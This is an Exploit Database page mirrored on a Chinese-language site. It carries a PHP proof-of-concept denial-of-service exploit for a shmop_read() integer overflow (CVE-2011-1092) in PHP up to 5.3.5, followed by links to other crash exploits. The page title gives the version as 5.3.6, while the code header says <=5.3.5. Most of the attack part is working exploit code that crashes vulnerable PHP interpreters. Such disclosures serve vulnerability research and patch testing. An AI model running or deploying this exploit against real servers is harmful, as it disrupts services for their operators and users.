PHP 5.3.6 – ‘shmop_read()’ Integer Overflow Denial of Service

Exploit Database
10 阅读

作者： Jose Carlos Norte

日期： 2011-03-12
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/16966/

<?php
# Exploit Title: PHP <=5.3.5 Integer Overflow DoS
# Date: 12-03-11
# Author: Jose Carlos Norte - www.rooibo.com
# Software Link: www.php.net
# Version: <= 5.3.5
# Tested on: Ubuntu Linux
# CVE : CVE-2011-1092

$shm_key = ftok(__FILE__, 't');
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of memory!
//or we are in a patched php
echo "this php version is not vulnerable!";

?>

last Exploits
PHP 5.3.6 – ‘shmop_read()’ Integer Overflow Denial of Service的更多信息

MP3 Wav Editor 3.80 – ‘.mp3’ Local Denial of Service：
Sysax Multi Server 6.95 – ‘Password’ Denial of Service (PoC)：
Microsoft Internet Explorer 11 – Stack Underflow Crash (PoC)：
Winamp 5.13 – ‘.m3u’ File Exception Handling Remote Denial of Service：
Rhythmbox – ‘.m3u’ Local Crash (PoC)：
D-Link DIR-605L < 2.08 - Denial of Service：
RealPlayer – FLV Parsing Integer Overflow：
TP-Link WR840N 0.9.1 3.16 – Denial of Service (PoC)：